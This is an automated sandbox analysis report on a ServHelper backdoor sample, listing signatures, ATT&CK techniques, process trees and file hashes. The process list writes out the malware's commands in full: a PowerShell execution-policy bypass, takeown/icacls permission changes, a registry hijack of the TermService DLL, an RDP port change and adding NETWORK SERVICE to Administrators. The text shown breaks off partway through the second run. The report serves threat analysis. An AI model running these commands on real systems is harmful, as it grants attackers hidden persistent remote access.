Malware Analysis Report

2024-08-06 05:35

Sample ID 240405-fe1kxsda24
Target cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118
SHA256 ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
Tags
servhelper backdoor discovery exploit persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb

Threat Level: Known bad

The file cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan

ServHelper

Grants admin privileges

Possible privilege escalation attempt

Sets DLL path for service in the registry

Modifies RDP port number used by Windows

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs net.exe

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Account Manipulation
T1098
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
File and Directory Permissions Modification
T1222
Credential Access
TA0006
Discovery
TA0007
Lateral Movement
TA0008
Remote Services
T1021
Remote Desktop Protocol
T1021.001
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-05 04:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-05 04:47

Reported

2024-04-05 04:50

Platform

win7-20240319-en

Max time kernel

118s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\SysWOW64\reg.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\rfxvmt.dll C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1372 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1372 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1372 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1372 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2440 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2136 wrote to memory of 2440 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2136 wrote to memory of 2440 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2136 wrote to memory of 2440 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2440 wrote to memory of 2752 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2440 wrote to memory of 2752 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2440 wrote to memory of 2752 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2440 wrote to memory of 2752 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2136 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1524 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 2136 wrote to memory of 1524 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 2136 wrote to memory of 1524 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 2136 wrote to memory of 1524 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 2136 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2616 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2616 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2616 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2616 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2028 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 2028 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 2028 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 2028 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 1368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 1368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 1368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 1368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\miiif39e.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES512D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC512C.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\SysWOW64\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

N/A

Files

memory/1372-0-0x0000000000280000-0x000000000068B000-memory.dmp

memory/1372-1-0x0000000074510000-0x0000000074BFE000-memory.dmp

memory/1372-2-0x0000000004AC0000-0x0000000004B00000-memory.dmp

memory/1372-3-0x0000000004F00000-0x0000000005304000-memory.dmp

memory/1372-4-0x0000000004AC0000-0x0000000004B00000-memory.dmp

memory/2136-9-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2136-10-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2136-11-0x0000000002650000-0x0000000002690000-memory.dmp

memory/2136-12-0x0000000002650000-0x0000000002690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\miiif39e.cmdline

MD5 55cab6f59435b35b1d0cca920e0701d2
SHA1 a3faa88fea8216ad14a601c9b56b51fef9782c11
SHA256 e3976f0b919206abd33e4e424b53538987d498b9d1fea15175ce5b27c64a6408
SHA512 a092324d71bb38f6e9a1564a616ab6cff9bb230a4e5d77e824611e0a71dc7162e3b112ad5282836607ea0692b63bfa1394adc6f214fc744f3958285398c18c5a

\??\c:\Users\Admin\AppData\Local\Temp\miiif39e.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/1372-19-0x0000000074510000-0x0000000074BFE000-memory.dmp

memory/2440-20-0x0000000000520000-0x0000000000560000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC512C.tmp

MD5 9176800871f6a699d24516a99c49a645
SHA1 8248d33307217453d5877820874517f353e20aed
SHA256 c201ea9cb1e115b9ba5c50beee167ddebe98f85e4327bc74bfabd2911e1fa2cb
SHA512 77a8369552b38c5fa8c8fe2fee1b195240169416167384d30bd8844fad6806c51ce6f1ada0b6ed820a921cb4d2ed4d794d1f0030b62f5daf9146a6af08bf6ce6

C:\Users\Admin\AppData\Local\Temp\RES512D.tmp

MD5 8788b6193403caa021c7c5cf6763c29e
SHA1 22dcf43e9b880b7d4003567f253370f72f35df02
SHA256 0e2cbe0fedcdafb9ffb39598d200b2ad869d8ae0e6a2b6a23ebc729d1022ff3a
SHA512 c27b9d9a7ed345b32d8c7d4ea4999661dbb00abbda1ddd3cd107d3b34892d6786583f87ae705d68966d43bf7f8375590782dbee5906947d48c368d14b097ae48

C:\Users\Admin\AppData\Local\Temp\miiif39e.dll

MD5 39636324fcfb91371a0809ccb7bd7bee
SHA1 ea75b4ad84d3678a7539a7ba6ecfe25098190021
SHA256 7c57a3cab28ef40fa0e27352a2c15dbc0e93ff7d9cd9c0ee536289ef56120325
SHA512 4d487a2e320d80f8f3b272aad916f0b22f3174808db445badc57a2ae2ae795f4ec2b8900646db7b888ae081287e5821d775aa4656c5d11f7ccdc48caa3a1f03a

C:\Users\Admin\AppData\Local\Temp\miiif39e.pdb

MD5 0d9be7b21b0ff6b81bf710252f8d32e0
SHA1 8f06ec36a8e864acbc71b4b0b315be09201c6118
SHA256 cde4cbfbc929a320a5ce636e5c748c3f10443709ed3bfdb05d1d9d474a811405
SHA512 b6867a480a58e6574f73f52b6a6ccd3fc6e17f5423345ffdd434d73d0a48f136982e9402776ffb7619aac04ed259a71581a7f5307047b65422f696c94b1aa57e

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 841cc93778b4ec353d0075d717b90df4
SHA1 287f652b7be199d127aab4655055654a6ea2bed6
SHA256 77f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1
SHA512 a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541

memory/1372-32-0x0000000004AC0000-0x0000000004B00000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 59d761df839b8572fb532dc2ebaff759
SHA1 003c5670dc967077616510a47af8b64cb2fd6a7a
SHA256 f26551c790cfb3d5d0b831fcf0878e748e4a0e464f816c38ce61dd974e2ed08d
SHA512 3aaca2f1f5ef31f128c93777c812f3e6d498fe942c50ff82b045a27799e8cf7484af090cef841b879d628f54a6a2a6cc9cc1b196fd55be947107ee20c2e356bd

memory/1372-38-0x0000000004AC0000-0x0000000004B00000-memory.dmp

memory/2724-39-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2724-40-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/1372-41-0x0000000004AC0000-0x0000000004B00000-memory.dmp

memory/2724-42-0x0000000002570000-0x00000000025B0000-memory.dmp

memory/2724-43-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2484-49-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/1372-50-0x0000000004AC0000-0x0000000004B00000-memory.dmp

memory/2484-51-0x00000000028B0000-0x00000000028F0000-memory.dmp

memory/2484-52-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2136-53-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2484-54-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1964-61-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/1964-63-0x0000000002800000-0x0000000002840000-memory.dmp

memory/2136-62-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/1964-64-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/1964-65-0x0000000002800000-0x0000000002840000-memory.dmp

memory/1964-66-0x0000000002800000-0x0000000002840000-memory.dmp

memory/1964-67-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

memory/2136-69-0x0000000002650000-0x0000000002690000-memory.dmp

C:\Windows\SysWOW64\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-05 04:47

Reported

2024-04-05 04:50

Platform

win10v2004-20240226-en

Max time kernel

146s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\SysWOW64\reg.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
